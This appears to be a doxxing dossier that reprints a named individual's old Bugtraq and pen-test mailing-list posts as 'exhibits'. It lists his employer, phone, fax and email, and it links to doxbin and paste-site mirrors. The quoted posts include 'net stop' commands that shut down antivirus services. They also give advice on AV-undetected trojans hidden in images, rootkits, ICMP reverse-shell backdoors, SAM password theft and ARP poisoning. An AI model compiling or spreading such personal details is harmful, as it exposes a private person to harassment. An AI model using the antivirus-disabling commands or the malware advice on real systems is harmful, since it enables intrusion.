Exhibit D: https://bugtraq.securityfocus.narkive.com/AkKZ5lW3/trend-micro-officescan-for-win2k-strange-behaviour

Discussion: Trend Micro Officescan for Win2k strange behaviour

Marco Monicelli (17 years ago):

Hello List!

I've noticed the following "weird" behaviour of the Trend Micro Officescan client vers. 5.58, update to pattern 1.936.00, Engine 7.100 for WinXP/2k/NT:

The AV client is protected from unloading the Realtime Scan agent by prompting for a password (which I don't know, of course). Moreover, I do NOT have admin rights, which allows me to perform a full system scan but not to unload the client and/or the realtime protection.

Playing with the "net" command on a DOS prompt, I found out that the AV launches itself and the realtime prot as services automatically. Then I tried to stop the services with the simple commands

    net stop "OfficeScanNT Listener"
    net stop "OfficeScanNT RealTime Scan"

Guess what? The two services have been successfully stopped on my system.

What do you guys think of this? Should I advise the AV company of this, or is this normal behaviour?

Tnx for feedback.

Ciao
Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: ***@marcegaglia.com

Seth Hall (17 years ago):

Marco,

You don't have to be an administrator of the local machine to start and stop services.
By default, members of the Power Users group have the ability to stop and start services on their local computer, which is probably what you are logged on as. Members of the Users group cannot, by default, stop and start services.

I was able to stop my OfficeScan service from a Power User account, but not from a User account (just checked to make sure Trend hadn't put in any proprietary settings).

Your net admin should either not be giving out Power User status or should be locking down services so that members of the Power Users group can't control their stop/start (which may or may not be possible). Trend is powerless against incorrect configuration, I'd imagine.

/Seth Hall

-----Original Message-----
From: Marco Monicelli [mailto:***@marcegaglia.com]
Sent: Wednesday, July 14, 2004 2:28 AM
To: ***@securityfocus.com
Subject: Trend Micro Officescan for Win2k strange behaviour
Importance: High

3APA3A (17 years ago):

Dear Marco Monicelli,

--Wednesday, July 14, 2004, 1:28:24 PM, you wrote to ***@securityfocus.com:

MM> Playing with the "net" command on a DOS prompt, I found out that the AV
...
MM> net stop "OfficeScanNT Listener"
MM> net stop "OfficeScanNT RealTime Scan"

It's a bug of any automated system. It's documented as "Kiddie with elevated privileges can make any protection unusable". Windows is very vulnerable to this problem.

--
~/ZARAZA
Well, and now, William, think this letter over thoroughly. (Twain)

--------------------------------------------------------------------------------------------

Exhibit E: http://www.blacksheepnetworks.com/security/resources/pentest/6537.html (A continuance from Exhibit A)

RE: Hacking to Xp box
From: Marco Monicelli (marco.monicelli@marcegaglia.com)
Date: Mon Sep 05 2005 - 13:46:15 EDT
In reply to: Eduardo Suzuki: "RE: Hacking to Xp box"

Dear Eduardo/list,

I didn't discuss the fact that a server is much more juicy to hit for a hacker than the simple workstation, even if it is the CEO box. Once this is stated, we can proceed with the next point.

First, SP2's firewall can be easily bypassed, as most firewalls can, with injection techniques. In fact, they normally tend to allow HTTP traffic, for example. If the firewall doesn't block ICMP, you can use some ICMP backdoor which replies to a specially crafted ICMP ping packet with a reverse connect shell. If you get admin privileges on that box, you can even think of stopping the firewall service on that machine. If the RAW sockets limit is your problem, you can easily ENABLE the raw sockets back with the right command lines (google is your best friend once again).
Regarding the JPG/GIF question, there are many joiners/mergers on the net which are not recognized by AV and which can hide an EXE file inside the picture. Once the guy opens the pic, the EXE is executed hiddenly and secretly. I'm not taking into consideration the buffer overflow vulnerability as it is now a bit too old to be exploited (especially on a fully patched machine). So the trick is just that a "not really expert" guy will prolly open a picture (curiosity helps hackers a lot) and get infected easily without exploiting any vulnerability. I call this "curiosity engineering".... ehehehhehe....

HXDEF is correctly a rootkit, which means you first have to get admin rights on the target box. I've suggested that in order to mention rootkits which can be useful to a hacker once he has got admin privileges. Did you ever see this file "hxdef defeating modern detectors.rar"? It is a movie which shows how it is NOT detected by most of the rootkit hunters. But maybe that movie is not updated and you're right (I couldn't test it, unfortunately).

Anyway, the main point to show the CEO the insecurity of the box is to get ADMIN privileges over there. Then you can choose the game you wanna play on that computer.

I'm open to any further suggestion; tnx for yours, Eduardo.

Cheers
Marco

Hi, Marco!

IMO, I think it's harder to attack a workstation compared to a server through a network, since servers must have some open port in listening state. On a workstation the user is the weakest point most of the time, while on a server there are many other parts to take into account.

If there is a firewall in place (for example, the one that comes with XP SP2), which attacks are possible through a network? AFAIK just a few. Windows XP restricts most of the attacks that use anonymous connections. Service Pack 2 restricts even more. If you are a domain admin, there are many possibilities, but that's not the case here.

What do you mean by "executing a jpg or a gif file"? I know there are buffer overflow vulnerabilities that can be exploited when opening an image, but it's not a trivial attack. I'm not sure (because I didn't try it), but I think it's even harder to do it when you need to merge an executable into an image using a joiner. I'd like to know what you think about it.

Regarding the hxdef rootkit, you can find it out by using RootKitRevealer from SysInternals. It's available at http://www.sysinternals.com/Utilities/RootkitRevealer.html. BTW, hxdef isn't considered an attack tool. It's used after you successfully got access to a computer, when you want to hide files, open ports and so on.

Just my $0.02.

Regards,
Eduardo Suzuki
esuzuki_br@pop.com.br
Eduardo.AC.Suzuki@gmail.com
"The essential is invisible to the eyes."

-----Original Message-----
From: Marco Monicelli [mailto:marco.monicelli@marcegaglia.com]
Sent: Friday, September 02, 2005 6:12 AM
To: Juan B
Cc: pen-test@securityfocus.com
Subject: Re: Hacking to Xp box
Importance: High

Ciao juan!

If the CEO box is fully patched and FW is enabled, then your mission is a little bit more difficult to accomplish. Besides, there are thousands of recent exploits for windows which you can try. For example, did you try the Universal exploit for the Plug and Play vulnerability? It is published everywhere. You can try with more recent exploits than the DCOM exploit, which is at least 3 years old.

If you want to try with the trojan, I would suggest you to google for Bifrost, which is a Remote Administration Tool (you can call it trojan if you prefer) that is completely UNDETECTED by any AV (at the moment it is still 100% undetected). You can pack it inside any file (exe, jpg, gif....) and it will be executed silently and hiddenly. Moreover, Bifrost can bypass firewalls by injecting itself into the Explorer.exe process. Another good UNDETECTED tool is the hxdef rootkit.

Arp poisoning could do the job, but why not try to steal the SAM file and crack it? You can do that remotely if the machine has the ports you mentioned open. I bet you know some tool to steal the SAM and crack it. I love SAMDUMP, for example. ;)

Last but not least, you can try with a Denial of Service to show your CEO how easily a kid can prevent you from working with a simple DoS.

Why not sniff the network? There are many undetected sniffers around the Web.

Just my 2 cents ;)
Marco

Hi Guys

Please give me a hand here. I'm trying to penetrate the CEO box to show him why we need better security in our company; he told me to show him how it can be done. He has XP Pro SP2 with all the patches installed and FW enabled, but I can't! I tried to use metasploit with the ms rpc dcom exploit but it didn't work. Nessus found ports 135, 139, 2000 and ntp are open, and also that he can read some smb shares, and also outputted that this host doesn't discard SYN packets that have the FIN flag set, and that port 2000 (callback) is open. What more can I try to break this box? Any ideas? I know I can always try to arp poison his arp table and pass all the machine's traffic through my laptop to capture some passwords, but this is enough. Or send him a trojan, but we have good anti virus protection. Does any of you have ideas?

Thanks a lot!
Juan

----------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do!
Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831
----------------------------------------------------------------------------

-------------------------------------------------------------------------------

Exhibit F: https://marc.info/?l=bugtraq&m=108991985612069&w=2

List: bugtraq
Subject: Trend Micro Officescan for Win2k strange behaviour
From: Marco Monicelli
Date: 2004-07-14 9:28:24
Message-ID: OFF477B9CD.96AC5FC0-ONC1256ED1.00334DA6-C1256ED1.00340A3A () marcegaglia ! com

Hello List!

I've noticed the following "weird" behaviour of the Trend Micro Officescan client vers. 5.58, update to pattern 1.936.00, Engine 7.100 for WinXP/2k/NT:

The AV client is protected from unloading the Realtime Scan agent by prompting for a password (which I don't know, of course). Moreover, I do NOT have admin rights, which allows me to perform a full system scan but not to unload the client and/or the realtime protection.

Playing with the "net" command on a DOS prompt, I found out that the AV launches itself and the realtime prot as services automatically. Then I tried to stop the services with the simple commands

    net stop "OfficeScanNT Listener"
    net stop "OfficeScanNT RealTime Scan"

Guess what? The two services have been successfully stopped on my system.

What do you guys think of this? Should I advise the AV company of this, or is this normal behaviour?

Tnx for feedback.

Ciao
Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: marco.monicelli@marcegaglia.com

----------------------------------------------------------------

Mirrors:
https://doxbin.org/user/LarpKillaz
https://controlc.com/0b2e78bb
https://skidbin.net/paste/Ug45GeKjMF
https://ghostbin.com/paste/eQ8LT

End of Log
-----------------------------------------------------------------------------
~BWA~ "The House Always Wins"